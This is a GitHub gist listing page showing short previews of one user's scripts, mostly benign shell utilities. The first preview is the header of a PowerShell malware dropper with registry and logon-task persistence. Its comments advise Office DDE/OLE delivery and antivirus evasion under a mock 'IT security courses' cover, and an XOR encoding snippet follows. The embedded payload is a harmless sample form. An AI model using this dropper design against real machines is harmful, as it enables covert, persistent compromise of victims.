loadenmb
/ dropper_scheduler_registry_persistence.ps1
Created
October 7, 2019 08:03
powershell payload dropper written in powershell with persistence in registry and startup as scheduled task at logon for user
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # powershell payload dropper written in powershell with persistence in registry and startup as scheduled task at logon for user. | |
| # sample usage: inside Microsoft DDE, OLE dropper to send persistence invites for IT security courses for employee whose know your course already. | |
| # use with av evasion always to be sure your courses has enough participants (I will link good power point tutorial later) | |
| $regp = "securesoft"; # registry path / task name | |
| $regn = "guard"; # registry key name / task name | |
| # base64 encoded powershell payload or URL which output base64 encoded powershell | |
| $payloadBase64 = "QWRkLVR5cGUgLUFzc2VtYmx5TmFtZSBTeXN0ZW0uV2luZG93cy5Gb3JtczsKJEZvcm0gPSBOZXctT2JqZWN0IHN5c3RlbS5XaW5kb3dzLkZvcm1zLkZvcm07CiRGb3JtLlRleHQgPSAiU2FtcGxlIEZvcm0iOwokTGFiZWwgPSBOZXctT2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLkxhYmVsOwokTGFiZWwuVGV4dCA9ICJUaGlzIGZvcm0gaXMgdmVyeSBzaW1wbGUuIjsKJExhYmVsLkF1dG9TaXplID0gJFRydWU7CiRGb3JtLkNvbnRyb2xzLkFkZCgkTGFiZWwpOwokRm9ybS5TaG93RGlhbG9nKCk7Cg=="; |
loadenmb
/ download_rndIMG_loremflicker.sh
Created
October 10, 2019 08:10
Bulk download random images with predefined keywords and size from loremflickr.com to current directory
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # bulk download random images with predefined keywords and size from loremflickr.com to current directory | |
| # config | |
| KEYWORDS="beach,girl" # search keywords comma separated | |
| WIDTH=800 # image width | |
| HEIGHT=600 # image high | |
| COUNT=2 # image count | |
| MAXTRIALS=3 # max errors until stop |
loadenmb
/ snippet-pwsh_xorhexbyte.ps1
Created
October 19, 2019 18:41
powershell XOR encoder / decoder and hex / byte - byte / hex conversions
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # powershell XOR encoder / decoder and hex / byte - byte / hex conversions | |
| # usage: execute & see output | |
| # xor encoder / decoder | |
| function xor($bytes, $string) { | |
| $newBytes = @(); | |
| for ($i = 0; $i -lt $bytes.Count; $i++) { | |
| $newBytes += $bytes[$i] -bxor $string[$i % $string.Length]; | |
| } | |
| return $newBytes; |
loadenmb
/ setup_sshdHiddenService.sh
Created
September 10, 2019 17:52
sshd tor authenticated hidden service setup script
loadenmb
/ multiple_vcard2single.sh
Created
October 7, 2019 15:37
multiple vcards (*.vcf) to single vcard converter (all.vcf)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #! /bin/sh | |
| # multiple vcards (*.vcf) to single vcard converter (all.vcf) | |
| # usage: place in vcard directory and execute to convert multiple .vcf from current directory to single one named all.vcf | |
| # do for all .vcf files from directory | |
| for file in *.vcf; do | |
| # add file content do single vcard | |
| cat "$file" >> ../all.vcf |
loadenmb
/ randPlay.sh
Created
October 7, 2019 15:36
Play sound of random file from directory in background without video output
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #! /bin/sh | |
| # play sound of random file from directory in background without video output | |
| # usage: play random audio or video file at special time with cron :) | |
| # setup on debian: apt-get install -y vlc alsa-utils | |
| # directory to choose random videos from | |
| DIR="/home/user/Videos/rand"; | |
| # get random file from dir |
loadenmb
/ setup_cryptdevice_automount.sh
Created
May 20, 2019 12:36
Create auto mount of luks encrypted volume on system start
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #! /bin/sh | |
| # create auto mount of luks encrypted volume on system start | |
| # scripts requirements: cryptsetup (luks), awk, grep, dd | |
| # files changed by script: /etc/crypttab, /etc/fstab | |
| # files created by script: DRIVE_PATH (mount path) | |
| # tested on: debian stretch | |
| # set configuration & chmod +x this script ;) & run this script | |
| # see: https://blog.tinned-software.net/automount-a-luks-encrypted-volume-on-system-start/ | https://linuxwiki.de/cryptsetup |